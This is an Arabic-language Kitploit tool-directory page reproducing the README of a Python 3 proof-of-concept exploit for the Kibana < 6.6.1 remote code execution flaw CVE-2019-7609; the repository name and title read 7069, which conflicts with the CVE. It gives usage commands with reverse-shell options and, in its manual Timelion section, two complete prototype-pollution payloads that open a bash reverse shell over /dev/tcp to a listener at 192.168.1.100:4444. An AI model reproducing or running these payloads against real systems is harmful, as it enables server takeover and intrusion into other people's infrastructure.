Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2019-7069-POC — # استغلال Python 3 لـ Kibana < 6.6.1 RCE (CVE-2019-7609) عبر تلوث النموذج الأولي، مع كشف تلقائي للإصدار وقشرة عكسية اختيارية. | Kitploit
أدوات/GitHubGitHub/caelumisme/cve-2019-7069-poc
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليمتطوير الحمولات
GitHubcaelumisme/cve-2019-7069-poc

CVE-2019-7069-POC

# استغلال Python 3 لـ Kibana < 6.6.1 RCE (CVE-2019-7609) عبر تلوث النموذج الأولي، مع كشف تلقائي للإصدار وقشرة عكسية اختيارية.

عرض المستودع
1منذ 10 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

استغلال تنفيذ الأوامر عن بعد في Kibana < 6.6.1 (CVE-2019-7609)

Exploit Banner

🚨 استغلال RCE تعليمي 🚨

المؤلف: LandGrey (إعادة هيكلة Python3 بواسطة [اسمك])
المرجع: مدخل Exploit-DB 46651
CVE: CVE-2019-7609


⚠️ إخلاء مسؤولية:
هذا النص البرمجي مخصص لأغراض تعليمية واختبارات الاختراق المصرح بها فقط. لا تستخدمه على أنظمة لا تملكها أو ليس لديك إذن صريح لاختبارها. المؤلف والمساهمون غير مسؤولين عن أي استخدام خاطئ أو ضرر ناتج عن هذه الأداة.


🎯 ما هذا؟

هذا نص برمجي استغلال بلغة Python 3 لـ ثغرة تنفيذ الأوامر عن بعد في إصدارات Kibana < 6.6.1. يستغل عيبًا في تلوث النموذج الأولي (prototype pollution) لتنفيذ أوامر عشوائية، بما في ذلك إطلاق شل عكسي، على مثيل Kibana ضعيف.

🕹️ المميزات

  • يكتشف إصدار Kibana تلقائيًا
  • يتحقق من حالة الثغرة
  • يطلق اختياريًا شل عكسي إلى المستمع الخاص بك
  • خرج طرفية نظيف وتفاعلي
  • متوافق تمامًا مع Python 3

📚 المراجع

  • مدخل Exploit-DB 46651
  • الموقع الرسمي لـ Kibana
  • CVE-2019-7609

🚀 الاستخدام

root@kitploit:~
python3 kibana_exploit.py -u http://target-kibana:5601

لإطلاق شل عكسي:

root@kitploit:~
python3 kibana_exploit.py -u http://target-kibana:5601 --shell -host YOUR_IP -port LISTENER_PORT

مثال

root@kitploit:~
python3 kibana_exploit.py -u http://10.10.10.100:5601 --shell -host 10.10.10.200 -port 4444

🛠️ المتطلبات

  • Python 3.x
  • مكتبة requests
  • مكتبة packaging

قم بتثبيت التبعيات باستخدام:

root@kitploit:~
pip install requests packaging

💡 الاستغلال اليدوي عبر Timelion

يمكنك أيضًا استغلال هذه الثغرة يدويًا باستخدام أداة التصور Timelion في Kibana:

  1. افتح Kibana
  2. الصق إحدى الحمولتين التاليتين في أداة التصور Timelion
  3. انقر على تشغيل
  4. في اللوحة اليسرى، انقر على Canvas
  5. يجب أن تظهر شل العكسي الخاص بك! :)

الحمولة بواسطة securityMB:

root@kitploit:~
.es(*).props(label.__proto__.env.AAAA='require("child_process").exec("bash -i >& /dev/tcp/192.168.1.100/4444 0>&1");process.exit()//')
.props(label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ')

الحمولة بواسطة chybeta:

root@kitploit:~
.es(*).props(label.__proto__.env.AAAA='require("child_process").exec("bash -c \\'bash -i>& /dev/tcp/192.168.1.100/4444 0>&1\\'");process.exit()//')
.props(label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ')

استبدل 192.168.1.100 و 4444 بعنوان IP ومنفذ المستمع الخاص بك.


🧩 كيف يعمل

  • يكتشف إصدار Kibana عبر طلب HTTP
  • يتحقق مما إذا كان الهدف عرضة لـ CVE-2019-7609
  • يستغل تلوث النموذج الأولي لتنفيذ أوامر عشوائية
  • يطلق اختياريًا شل عكسي إلى المضيف والمنفذ المحددين

🎨 المخرجات

يوفر النص البرمجي مخرجات واضحة خطوة بخطوة للكشف والتحقق والاستغلال، مما يجعله سهل المتابعة وممتعًا في الاستخدام!


👾 للمتعة والتعلم

هذا النص البرمجي وسيلة رائعة لتعلم تلوث النموذج الأولي، تنفيذ الأوامر عن بعد، وتقنيات اختبار الاختراق. استخدمه بمسؤولية، ودائمًا بإذن!


📝 الترخيص

هذا المشروع مخصص للاستخدام التعليمي فقط. لا يوجد ضمان، ولا ضمانات. اخترق بأخلاق، وابق فضوليًا، واستمتع!

تنزيل الأداة